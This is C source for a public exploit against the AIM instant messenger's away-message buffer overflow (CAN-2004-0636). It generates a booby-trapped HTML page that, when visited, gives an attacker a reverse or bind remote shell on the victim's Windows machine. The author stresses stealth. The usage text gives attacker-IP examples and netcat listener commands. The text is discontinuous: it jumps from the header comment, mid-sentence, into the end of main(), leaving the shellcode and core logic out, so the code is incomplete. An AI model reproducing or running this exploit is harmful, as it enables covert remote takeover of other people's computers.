/* CAN-2004-0636 */ /* * AIM Away Message Buffer Overflow Exploit * Exploit by John Bissell A.K.A. HighT1mes * * Exploit: * ======== * drizzit.c * * Vulnerable Software: * ==================== * - AIM 5.5.3588 * - AIM 5.5.3590 Beta * - AIM 5.5.3591 * - AIM 5.5.3595 * and a couple others versions... * * If you want to try other return addressees for other versions of * AIM then edit the return address.. But the current one embedded * will work for sure with all the AIM versions listed above. * * I used some of the metasploit shellcode for this exploit with some * modifications to get this into stealth mode so it is harder to * detect the attack. Since I'm using metasploit shellcode that means this * exploit can be used on any NT type OS, like win2k, winnt, winxp across * any service pack.. I don't know about SP2 though I haven't tested * it yet. * * On a side note I pourposly did not include the download+exec shellcode * even though I have it because I'm sick and tired of these little * spam/adware bitchs messing peoples computers up for profit.. You can * still download/upload through the shell to the victim. It just * isn't automated like download+exec would be. * * In my opinion the reverse connect (-r option) is the most dangerous * because you can encode your ip address and pick a port, and then * when the victim visits the evil web page or email whatever.. then the * attack will automatically open his AIM even its not already open and * connect to you and then terminate the AIM process to be stealth so * the victim doesn't know what him them.. As I remind people in the * exploit usage you need to remember to use netcat to listen on a * port you picked for the exploit to connect to... * * One reason I decided to include the generation of html code for * this exploit is I noticed almost no puts small limits on the * \n"); fprintf(EXPLOIT_FP, "\n"); fprintf(EXPLOIT_FP, "\n"); fclose(EXPLOIT_FP); /* im to lazy to make a macro for this banner :P */ printf(" +-------------------------------------------------+\n"); printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes |\n"); printf(" | AIM Away Message Buffer Overflow Exploit |\n"); printf(" +-------------------------------------------------+\n\n"); printf(" Exploit created!\n\n"); printf(" Remember if you use the -r option to have netcat listening\n"); printf(" on the port you are using for the attack so the victim will\n"); printf(" be able to connect to you when exploited...\n\n"); printf(" Example:\n"); printf("\tnc.exe -l -p %d", port); } return(EXIT_SUCCESS); } void print_usage(char *prog_name) { printf(" +-------------------------------------------------+\n"); printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes |\n"); printf(" | AIM Away Message Buffer Overflow Exploit |\n"); printf(" +-------------------------------------------------+\n\n"); printf(" Exploit Usage:\n"); printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name); printf(" Parameters:\n"); printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or -b then a bind\n\t\t\t\t attack will be generated.\n\n"); printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind then the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode is reverse connect then the port you\n\t\t\t\t specify will be the one you want to listen\n\t\t\t\t on so the victim can connect to you\n\t\t\t\t right away.\n\n"); printf("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If you would like output go straight to\n\t\t\t\t standerd output then specify the -o option\n\t\t\t\t otherwise give the path of where you want to\n\t\t\t\t create the exploit file which is basically\n\t\t\t\t a simple html file. The -o option is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different ways.\n\n"); printf(" Examples:\n"); printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name); printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name); printf("\t%s -b -o\n", prog_name); printf("\t%s -r 68.6.47.62 -o\n\n", prog_name); printf(" Remember if you use the -r option to have netcat listening\n"); printf(" on the port you are using for the attack so the victim will\n"); printf(" be able to connect to you when exploited...\n\n"); printf(" Example:\n"); printf("\tnc.exe -l -p 8888"); exit(-1); } unsigned char xor_data(unsigned char byte) { return(byte ^ 0x92); } // milw0rm.com [2004-09-02]